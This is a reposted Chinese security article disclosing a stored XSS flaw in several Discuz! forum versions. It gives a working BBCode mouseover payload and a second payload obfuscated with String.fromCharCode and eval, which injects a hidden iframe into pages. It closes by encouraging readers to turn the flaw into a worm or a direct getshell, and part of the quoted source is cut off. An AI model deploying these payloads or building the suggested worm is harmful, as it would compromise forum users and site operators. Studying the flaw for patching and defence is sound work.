天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧安全 >> 正文

Discuz!多版本爆存储型XSS漏洞

2013-1-10linux安全网佚名

  XSS漏洞的测试案例分析如下:

  2009年一次偶然间测试发现的此XSS漏洞,因为是存储型的,我想大家应该知道它的危害吧。相隔这么多年Discuz不断的更新版本,但此XSS漏洞依然存在。

  在此我要感谢一下我的好朋友Jackal在09年的时候一起帮我测试漏洞的。当时我们一起测试的是Discuz6.0-Discuz7.2,不知道是不是通杀啊。没有一个一个去测试。有条件的去测试一下吧。

  发贴进入源码模式,写入如下的exp

  [email][url][img]http://www.linuxso.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]

  上面代码是以鼠标事件来触发XSS的,剩下的大家可以自行发挥构造!

  附上XSS完的源码如下:

  

  <

  我想你们一看就明白了吧!

  漏洞证明:

  本地测试结果:

  Discuz! X2

Discuz!多版本爆存储型XSS漏洞

  以下应用华东耶稣的话:鸡肋在于,要鼠标触碰才能触发,但是,鼠标触碰还是概率很大很大的嘛。

  把上面的alert(/DZ-XSS-0DAY/)换成

  eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,

  121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,

  101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,

  34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,

  102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,

  48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,

  84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,

  105,108,100,40,102,41,59))

  鼠标触碰效果:

Discuz!多版本爆存储型XSS漏洞

  加密过程,就是10进制加密啦,如图。

Discuz!多版本爆存储型XSS漏洞

  解密下看下代码。

Discuz!多版本爆存储型XSS漏洞

  好了,希望看完的朋友能写出个蠕虫,或者写个直接getshell的东西。我记得曾经有人写过dz的xss直接getshell的。

  Discuz和多版本爆存储型XSS漏洞的介绍就结束了,有兴趣的朋友请继关注此类资源。

本文来源:linux安全网 作者:佚名

声明
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。文章是出于传递更多信息之目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。 Email:support@txwb.com,系统开号,技术支持,服务联系微信:_WX_1_本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行